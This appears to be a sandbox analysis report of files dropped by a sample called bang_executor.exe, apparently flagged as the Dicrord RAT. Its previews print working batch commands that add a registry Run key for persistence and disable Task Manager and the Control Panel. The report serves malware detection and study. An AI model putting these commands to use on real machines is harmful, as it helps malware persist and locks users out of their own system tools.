                                      SSDEEP:3072:SbvuzfERbcS+gE1CCq/wZP3+vTPPdXd2Qj4oVmfyBOXpIymdSZoy6urw+tH1d4F2:wvujePeq/wt3QDVF+tVdp
                                      MD5:9FCD32435AB3BFB9F3AC22D5CE01D5AE
                                      SHA1:F31389EBAC610A7FA2A37DB284B3F5DCD714FD43
                                      SHA-256:1E13088A1A171C6548CD7462ABDD37F1715FC370621B80B0A6CE992D08E25442
                                      SHA-512:8F413C54166CFBE7B90BF4BFDBCD14C04D5438BB636888294BEDB8A03559F47CD0587E46A030F4DCC26A4CAB67311737052657A44F347E40119F73B0DF2195C3
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<....(...........(.......?..............l.......8...........T...........([...............3...........5..............................................................................eJ......l6......Lw......................T............F.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8754
                                      Entropy (8bit):3.697098077897683
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJssuo6YLZ6igmfZhEDGprp89bFqkf9Xm:R6lXJmo6Yl6igmfcDlFRfA
                                      MD5:B0BBE5EB76327E511DC94ED0EB0B4684
                                      SHA1:39264F41C2960B9C2B1ABB800B1AF7BF566534A2
                                      SHA-256:2E478D46C418DD41F3A0134AB62B8212A9640CE65386CC70AF87E78C7353C571
                                      SHA-512:A174D4DF41B40FA8A46165F65ECC132145EB16E1B1F5504BB88A46FB78975D12FB0EE56F292C134B3991F47254C4CB0759FC22FCACE0CA07B96FBCE364BE07D3
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.2.<./.P.i.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6782
                                      Entropy (8bit):3.7207337012946278
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbdMXYZhYTyiztDPgaM4Uv89bFcWDNqftXm:R6l7wVeJdMXYZhEDGprv89bFcWkftXm
                                      MD5:ADC08D562FE789A34C7B2CB17BA1D1BB
                                      SHA1:624BB041AD9395C0363A431A0437F4BFDF7EC17F
                                      SHA-256:3A1824069D156FE4D00673F8914DA7F36FCE97CB57E49FF65CB48FA2BBE07E72
                                      SHA-512:95433AAED7594F94458C1BBBF0965B76B586F589C3247F440333CF6B80D549FB183A537056037BAB369FB02781C51F5EAFC3170FA365CA6444688D7C110A878D
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.3.6.<./.P.i.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.465981198129252
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYBYm8M4JL4b6FZyq8vj4blwgJd:uIjfSI7Mh7VNJ82WUxwgJd
                                      MD5:D85A8B766B8BD01A8B97D5B45A97B4D3
                                      SHA1:4712BE54E9A7CE86BC4C9B2977BCBE4A6E7B4BE6
                                      SHA-256:100C24FE96D3A388EA8E2E2D7DB843BC52CF2741F1EE5537808FA0A11504AEA1
                                      SHA-512:8CBC85033E04E5163C957C5543E2272F0AE186E95F0A89EDE0571FA2E8C863D7879DB2A394FD964C578C38416E699B9C2C0BE10EB8213B67C893226F52E99E7D
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.46884000180897
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYiYm8M4JL4b6FYsyq8vj4bQKwg3d:uIjfSI7Mh7V6J8nsWU8Kwg3d
                                      MD5:451B584ADF982F4D817AD2E844F656D4
                                      SHA1:C684CA5B1AAEB787EB04B9E9663E3E14D02A77EC
                                      SHA-256:46CFF8CC7656A2A1EB037E73BE02E8C1F4542685F9BE81DB6FA1B0A5F5A102E4
                                      SHA-512:9628D9A13ED431A5ACE98EB10DD5E444BA54C0ACEF5195DBC578542C89C10F306D81BA32880C6F1C3504153080E80CA903B3686C49909E5B781BB41F08781EC5
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:15:00 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):541993
                                      Entropy (8bit):2.9288275066699176
                                      Encrypted:false
                                      SSDEEP:3072:Q1o97aAe7JMRscSLfdH+1CCqFs3M3+vrtIlP0nesoVmfyBOXpIymdSZQyV0D78oS:iH7AYz2qFmM3QErc0DWc
                                      MD5:2E9CCAE3404460BE92A887880C575786
                                      SHA1:E929036FB30DC79A238AC69667C9A2BCDFC347B8
                                      SHA-256:AB7E3BD09AEC7F03F01793DDA6C3848947B5CBC852417108F66F63E73714CCDD
                                      SHA-512:BE33CFDA97CF5B222D134A3A670FCEC832CAAFA8139B9C6B284F39E8657F66405D764FB611061CA6AF3395B16FDE70C06C87DA40885F5EF2A27440A5492B3F97
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<...p(...........(......T?..............l.......8...........T............Y..A............3...........5..............................................................................eJ......<6......Lw......................T............F.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8812
                                      Entropy (8bit):3.6966701500131545
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJctut6Y9rqm2LgmfZhEDGprM89bqckfZOm:R6lXJft6YxqZLgmfcDKq3fZ
                                      MD5:4159CD5C3BC52FBEA50A730CA3DC9C44
                                      SHA1:CF37E0057E03B03A141A4958DCE1437EFD6451BE
                                      SHA-256:E38CB5F32F5CF2604B12EC22A885296C5EE2F7828D0810637B7F624342A0E455
                                      SHA-512:20B29149C1E5C8C8C676585183F968FB8035A49BC10457DCDC18212F869B427453A3B2C335B43BF8F7CB18278DCD640DFCB0906F3D1A135116FCDE96B08EB0FA
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.6.<./.P.i.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.464483125288418
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYz5Ym8M4JL4b6Fzyq8vj4bycwgXd:uIjfSI7Mh7VlJ8QWUGcwgXd
                                      MD5:28819F5287AF50E3E35F4A83A491FC65
                                      SHA1:C2F09E609577EF160F8E81F6967C93B98F3F4735
                                      SHA-256:B202F56356E364AACAF0A5F69AE04F28390C347DF2E1173E427483D74E85C8BB
                                      SHA-512:087852F519F705CFAD3AA199DF92319C534AE4F167AB0072E3B3EE6360BECCA285E6FADA628FF779E8FA3C5DB1FF8AB759C0C37DD77DBEB1CD9A8DEF5D405C9A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:15:09 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):550505
                                      Entropy (8bit):2.9110246894423963
                                      Encrypted:false
                                      SSDEEP:3072:JO/8eERmcSY5Qr1CCqj2X3+vjsP6eg6z33HIoVmfyBOXpIymdSZZW8yP26bNrAwa:3PuNqj2X3Q4iegW+66w0
                                      MD5:A451D7CA0CE9DC7323A90F2101B26B66
                                      SHA1:C28377F37907890332BD13C1D2B3A20927CEF423
                                      SHA-256:9376AF0BC940B15896A326CCB9B206611753E6B3745A1D84920A508F061DF814
                                      SHA-512:AD157A1DFE5ED0E39EFDB9F87AE3C763121F8E8519B1836660294960D871CCD25B1B3A44BF328ADF0DAB7648321ADF40C935CE8FA1DCE9FCE49893D2C63FABD8
                                      Malicious:false
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8812
                                      Entropy (8bit):3.698263602154781
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJzyB6Y9yqhRgmfZhEDGprB89b7QkfBpm:R6lXJGB6YoqhRgmfcDd77f+
                                      MD5:460B597D8E868B33B4D6B8AA560B174D
                                      SHA1:E96025732AEB68BD4A95C16B2DB2F81DC97EFE83
                                      SHA-256:33D648D7F00D58F943D95EA36DFC388BD2CE476F04ED571C41E54FD0471B474C
                                      SHA-512:8FA956C25D35F17A596E26C5972151C82FD76C792CDC2FE2724031C526A8FB301094EBFDC60F514690FE148A93656054B550B120D1A264B88DE13DAC870D6769
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>7968</Pi
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.463838786595375
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VY6Ym8M4JL4b6FuHyq8vj4bLwg8d:uIjfSI7Mh7VeJ8BHWU3wg8d
                                      MD5:B47597C32A27CA4403BFC217796B9D4B
                                      SHA1:4D7B5D99ADD2C556994891DED9AFA4C4D6549654
                                      SHA-256:926F6130ACE7DA62EE812DAACA21D8E7482030DF4FADE28B97E1F79C3BE979FF
                                      SHA-512:DA2C2631D8C3CBE0A6EDF608BC07F224C15CDD9C43DB466AAAB58F32A0BA76C7C4449D82A665031B45607F4DEA912FB92AA7C6737591AB86AEA093FDC48121E0
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):226
                                      Entropy (8bit):5.355760272568367
                                      Encrypted:false
                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                      MD5:FC3575D5BE1A5405683DC33B66D36243
                                      SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                      SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                      SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):121
                                      Entropy (8bit):4.483195666121707
                                      Encrypted:false
                                      SSDEEP:3:mKDDSVTNT8rTJZz1ojkRowAXNYtY:hm9NT8rTJZejFwT+
                                      MD5:140D432DACC3A675F31BFC80171FC928
                                      SHA1:6B886CA57FC64D079F943FAE06210D41341B33B2
                                      SHA-256:DCB23167AC8ECCDB760AFC56B99EF4019CBCF9DBCDF1174F2040B361F3B4F534
                                      SHA-512:B925BEC48D68EC12E6829E07C6D45B313505164D60444DD556F3F6E1739BDB4192E1C2A7D1F14F53C8C77086E49AB9F419DF11E9B6C054906D05D5C38BA4CF6A
                                      Malicious:false
                                      Preview:@echo off....START bang_executor.exe....START executer.exe....START instaling.bat....START mgr.bat....START microsoft.bat
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):351232
                                      Entropy (8bit):3.6442831467064534
                                      Encrypted:false
                                      SSDEEP:1536:I2WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+IPID9IhZTRUpUI6bxNy8FkLlo5J3:IZv5PDwbjNrmAE+MIRIX26I6HjqJL4
                                      MD5:E1EAD094E52097B884389A8064B15E2B
                                      SHA1:894F8DB63A8F41F913A5F5C69D1199EC8AE3F213
                                      SHA-256:82C67ED82A7A319C0AE30F92C187EA0150AC6BA6EF63D2D3B4FC999BB01D064F
                                      SHA-512:96BF368C771BBC9DB1A23B8E57906530936372AA15C963EF370EF47A13328FC67201D4D184911679536CE952869A4BC2ABDC42403E1978028C57C27B154ECEA6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):280576
                                      Entropy (8bit):2.6303070804826034
                                      Encrypted:false
                                      SSDEEP:1536:aKaGOD3xvWxBVWGV489IhZTRUpUI6bxNy8FkLlo5J6/Sc/N2Qi4b:5NOD3xvWxBVWGV4GIX26I6HjqJLh
                                      MD5:88E22186F196CC0E1E2D500EEAC57337
                                      SHA1:E5E0BD98F08DE159880B58E918959C358EFCA6B1
                                      SHA-256:5DCA36CE98DA2185693A87305811CF7AEEE7B3279298345E4D1F4D37EFE0250B
                                      SHA-512:462FE680BA12DA5FEDEC11D88EA17F9F65B80EE916F665D6208D9DCF3D3494C805D11AAF899914F621835B0A61D014000243FE01B2E00CA34681AFC415A33EE6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 48%
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):269
                                      Entropy (8bit):5.123838184463971
                                      Encrypted:false
                                      SSDEEP:6:hQ+Pzmg83tuH1jhRUocn6BVuPzmg83tuH1jhRiD9cA6BY:eV8VjhRUocn6VnV8VjhR4cA6Y
                                      MD5:7E86BEB4C1EBEB8AB77F1D68F14FEC37
                                      SHA1:C9A40241B2407D9492C41BCD70686D6FD829F3BC
                                      SHA-256:5A60B3CC91782E0A7C8CD52701E603299B62C87C0B593D5AC85EBCE74321F2F3
                                      SHA-512:653CE9CBCF427BE11042340859F61CFA30105332ACAD13B94E2D509960BA04D67610276B6A7128D56AA139098B0C1C8D67973FFF7A97976ACFB33D474073D849
                                      Malicious:false
                                      Preview:@echo off..reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f..reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):111
                                      Entropy (8bit):4.957592385538409
                                      Encrypted:false
                                      SSDEEP:3:u3PpM2KD9so3KRfyM1K7eB/k+7W1DbJNAKyMhF7FKD:uPCtuH1jhRi26BY
                                      MD5:9A4A032D9A604C9B7C1E843C6455140E
                                      SHA1:DBE7A610E1697E62722EFB59AD3BC03AFCFD900F
                                      SHA-256:DC0890D3D4A7370ECE704EB075C05418795C47332DFFCC277896E806C38C3DB0
                                      SHA-512:CA045EC576EB55C442959C2709148392FE53F1613B6C5DC9CB5B43592D77563479233C7DEE6E0832E5A95528E1653BA6B73C73A3DC4ED841A7529E6344ECCB3C
                                      Malicious:false
                                      Preview:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                      Process:C:\Users\user\Desktop\bang_executor.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):288
                                      Entropy (8bit):4.979627165157923
                                      Encrypted:false
                                      SSDEEP:6:hmR9BX5Ev72tuH1jRNBiy4F3ndmROehC9DcLMLPDKvfhROehCi:w7sv7vVj4L3dm09DcLuDKHH0i
                                      MD5:77C6969C2641F3C5D6ED44A4FEB48F25
                                      SHA1:9FF375B96CD38CA40A9694698E9AA3BE1FC1D52E
                                      SHA-256:33DBEDBE9FB27DE7C1F75D742E3992675C4D683073538B02A8D69922F366CD6A
                                      SHA-512:530F05816854791916B3409161A1E488D661E02340C4AE7B442EDE31F7B21F70A6B5CFD5D1B330DDD202E104B5F4219253C537D32770E0FDDF0640D178EEFA68
                                      Malicious:false
                                      Preview:@echo off..set "scriptPath=%~dp0"..set "regKey=HKCU\Software\Microsoft\Windows\CurrentVersion\Run"....reg add "%regKey%" /v bang_executor /t REG_SZ /d "%scriptPath%bang_executor.exe" /f....REM bang_executor.exe is the name of your executable file..start "" "%scriptPath%bang_executor.exe"
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.465705900737471
                                      Encrypted:false
                                      SSDEEP:6144:WIXfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbi:bXD94fWlLZMM6YFH5+i
                                      MD5:1AC7374B4730933C5735AE46715CFC5E
                                      SHA1:7BAA427186A3AA367FC41B735D5B483030245B61
                                      SHA-256:74EDC34F926CA3D3C7F688BDAC3106E78C8779E6D688C5BD66E3C61A205CA657
                                      SHA-512:33D38780DEB0016DC6A90494629CAAD642880D202674574C6552B41857569054E427038F70A12A329F07E9A8746F5F861EF26247EEEF220DA789E2AB57FBF39F
                                      Malicious:false
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~.:}2`...............................................................................................................................................................................................................................................................................................................................................P,I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with very long lines (3074), with CRLF line terminators
                                      Category:modified
                                      Size (bytes):3076
                                      Entropy (8bit):4.958029243190065
                                      Encrypted:false
